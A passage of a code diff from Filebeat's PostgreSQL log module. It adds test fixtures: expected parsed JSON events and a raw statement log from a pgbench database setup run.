"postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 77000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8063, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.077 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8140, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8270, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8347, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 74000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8477, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.074 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8554, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8684, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8761, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8891, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8968, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 69000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9098, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.069 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9175, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9305, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9382, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 72000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9513, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.072 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9590, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: copy pgbench_accounts from stdin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "copy pgbench_accounts from stdin", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.355Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 188620000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9692, + "message": "2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: duration: 188.620 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.355 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.355Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9771, + "message": "2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:18:04.355 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.366Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 11135000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9847, + "message": "2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: duration: 11.135 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.366 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.366Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9925, + "message": "2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:18:04.366 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.383Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 16594000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10026, + "message": "2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: duration: 16.594 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.383 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.383Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10104, + "message": "2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:04.383 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.386Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3410000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10204, + "message": "2021-03-17 15:18:04.386 UTC [154] postgres@accounts LOG: duration: 3.410 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.386 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + } +] \ No newline at end of file diff --git a/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log new file mode 100644 index 00000000000..ad7d979c681 --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log @@ -0,0 +1,230 @@ +2021-03-17 15:10:20.767 UTC [118] postgres@postgres LOG: statement: CREATE DATABASE accounts; +2021-03-17 15:10:21.486 UTC [118] postgres@postgres LOG: duration: 719.436 ms +2021-03-17 15:10:27.112 UTC [126] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:27.115 UTC [126] postgres@postgres LOG: duration: 2.710 ms +2021-03-17 15:10:37.302 UTC [135] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:37.303 UTC [135] postgres@postgres LOG: duration: 1.111 ms +2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_history +2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: duration: 0.648 ms +2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:10:42.088 UTC [137] postgres@accounts LOG: duration: 3.140 ms +2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_tellers +2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: duration: 0.229 ms +2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:42.092 UTC [137] postgres@accounts LOG: duration: 3.339 ms +2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_accounts +2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: duration: 0.229 ms +2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:42.096 UTC [137] postgres@accounts LOG: duration: 1.494 ms +2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_branches +2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: duration: 0.166 ms +2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: duration: 1.914 ms +2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: statement: begin +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.559 ms +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.399 ms +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.281 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.077 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.059 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.072 ms +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.077 ms +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.073 ms +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: commit +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.879 ms +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: begin +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.062 ms +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: truncate pgbench_accounts +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.363 ms +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:10:42.295 UTC [137] postgres@accounts LOG: duration: 192.094 ms +2021-03-17 15:10:42.296 UTC [137] postgres@accounts LOG: statement: commit +2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: duration: 1.318 ms +2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: duration: 17.051 ms +2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: duration: 2.798 ms +2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 88.800 ms +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 0.442 ms +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: duration: 2.602 ms +2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: duration: 2.433 ms +2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:10:42.454 UTC [137] postgres@accounts LOG: duration: 42.396 ms +2021-03-17 15:10:44.222 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_history +2021-03-17 15:10:44.226 UTC [139] postgres@accounts LOG: duration: 4.849 ms +2021-03-17 15:10:44.228 UTC [139] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:10:44.231 UTC [139] postgres@accounts LOG: duration: 3.311 ms +2021-03-17 15:10:44.232 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_tellers +2021-03-17 15:10:44.235 UTC [139] postgres@accounts LOG: duration: 3.302 ms +2021-03-17 15:10:44.236 UTC [139] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: duration: 2.279 ms +2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_accounts +2021-03-17 15:10:44.245 UTC [139] postgres@accounts LOG: duration: 7.119 ms +2021-03-17 15:10:44.248 UTC [139] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:44.250 UTC [139] postgres@accounts LOG: duration: 2.267 ms +2021-03-17 15:10:44.255 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_branches +2021-03-17 15:10:44.260 UTC [139] postgres@accounts LOG: duration: 4.857 ms +2021-03-17 15:10:44.263 UTC [139] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 2.494 ms +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: begin +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 0.081 ms +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.319 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.189 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.087 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.109 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.169 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.099 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.105 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.081 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:10:44.268 UTC [139] postgres@accounts LOG: duration: 0.080 ms +2021-03-17 15:10:44.268 UTC [139] postgres@accounts LOG: statement: commit +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: duration: 3.046 ms +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: statement: begin +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: duration: 0.099 ms +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: statement: truncate pgbench_accounts +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: duration: 0.416 ms +2021-03-17 15:10:44.272 UTC [139] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:10:44.562 UTC [139] postgres@accounts LOG: duration: 289.924 ms +2021-03-17 15:10:44.562 UTC [139] postgres@accounts LOG: statement: commit +2021-03-17 15:10:44.563 UTC [139] postgres@accounts LOG: duration: 1.862 ms +2021-03-17 15:10:44.564 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:10:44.577 UTC [139] postgres@accounts LOG: duration: 13.040 ms +2021-03-17 15:10:44.577 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:10:44.580 UTC [139] postgres@accounts LOG: duration: 2.934 ms +2021-03-17 15:10:44.580 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:10:44.664 UTC [139] postgres@accounts LOG: duration: 84.018 ms +2021-03-17 15:10:44.664 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:10:44.665 UTC [139] postgres@accounts LOG: duration: 0.793 ms +2021-03-17 15:10:44.665 UTC [139] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:10:44.668 UTC [139] postgres@accounts LOG: duration: 3.258 ms +2021-03-17 15:10:44.668 UTC [139] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:10:44.671 UTC [139] postgres@accounts LOG: duration: 2.944 ms +2021-03-17 15:10:44.671 UTC [139] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:10:44.739 UTC [139] postgres@accounts LOG: duration: 68.048 ms +2021-03-17 15:10:47.438 UTC [149] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + 